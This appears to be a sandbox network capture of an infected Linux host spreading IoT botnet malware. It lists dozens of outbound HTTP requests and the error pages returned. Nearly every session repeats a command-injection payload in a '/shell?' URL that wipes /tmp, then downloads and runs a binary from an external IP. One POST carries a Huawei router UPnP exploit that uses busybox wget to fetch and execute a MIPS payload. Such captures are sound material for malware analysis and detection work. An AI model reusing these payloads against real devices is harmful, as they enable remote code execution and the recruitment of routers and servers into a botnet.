                                                            Expires: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 62 66 63 33 31 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 35 26 23 34 36 3b 32 37 39 32 33 65 61 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1bfc3117&#46;1706279545&#46;27923ea6</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            454192.168.2.2353608104.25.117.18280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.541471958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            455192.168.2.2334596104.24.90.8580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.541697025 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            456192.168.2.2356540154.208.206.14280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.566003084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            457192.168.2.233919452.109.60.2180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.609179974 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            458192.168.2.2342210196.50.71.10180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.635895967 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            459192.168.2.2342320104.90.119.1280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.639117956 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.792056084 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 61 64 33 63 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 35 26 23 34 36 3b 33 62 65 33 39 34 65 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;7ad3c17&#46;1706279545&#46;3be394ec</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            460192.168.2.2342970111.51.104.23180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.685688019 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:26.094122887 CET483INHTTP/1.1 400 Bad Request
                                                            Server: Tengine
                                                            Date: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 249
                                                            Connection: close
                                                            Via: vcache12.cn5087[,0]
                                                            Timing-Allow-Origin: *
                                                            EagleId: 0000000017062795459071163e
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            461192.168.2.2342972111.51.104.23180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.692850113 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:26.102988958 CET483INHTTP/1.1 400 Bad Request
                                                            Server: Tengine
                                                            Date: Fri, 26 Jan 2024 14:32:25 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 249
                                                            Connection: close
                                                            Via: vcache13.cn5087[,0]
                                                            Timing-Allow-Origin: *
                                                            EagleId: 0000000017062795459116172e
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            462192.168.2.235709286.69.202.2680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.701483011 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:26.367788076 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:27.647562027 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:30.431140900 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:35.550421953 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:45.789150953 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            463192.168.2.234785274.57.213.2080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.725795031 CET606INData Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 36 20 4a 61 6e 20 32 30 32 34 20 31 34 3a 33 32 3a 32 35 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
                                                            Data Ascii: (null) 400 Bad RequestServer: Date: Fri, 26 Jan 2024 14:32:25 GMTCache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0Content-Type: text/html; charset=utf-8X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=bl


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            464192.168.2.2340388213.29.44.22580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.756350994 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.980912924 CET113INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Type: text/plain
                                                            Transfer-Encoding: chunked
                                                            Jan 26, 2024 15:32:25.980926037 CET33INData Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: BBad Request0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            465192.168.2.2336592194.53.176.10180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:25.792213917 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:26.051911116 CET504INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Mon, 28 Sep 2015 21:12:43 GMT
                                                            Server: Cambium HTTP Server
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            466192.168.2.2356368197.234.61.13637215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:26.903685093 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            467192.168.2.235875235.171.5.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.234297037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.349658966 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            468192.168.2.233698813.49.35.10380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.348520994 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.571907043 CET420INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            469192.168.2.2349402210.158.145.5780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.374838114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.628612041 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 35 39 31 39 65 64 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 38 26 23 34 36 3b 32 30 30 32 31 35 34 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;35919ed2&#46;1706279548&#46;2002154d</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            470192.168.2.2339446195.22.248.21880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.382250071 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            471192.168.2.2345632154.82.120.2480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.451267958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:30.498620033 CET313INHTTP/1.1 400 Bad Request
                                                            Server: NgxFence
                                                            Date: Fri, 26 Jan 2024 14:32:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 153
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4e 67 78 46 65 6e 63 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>NgxFence</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            472192.168.2.2347038183.90.233.9480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:28.468364954 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:28.820647001 CET408INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:28 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Content-Length: 226
                                                            Connection: keep-alive
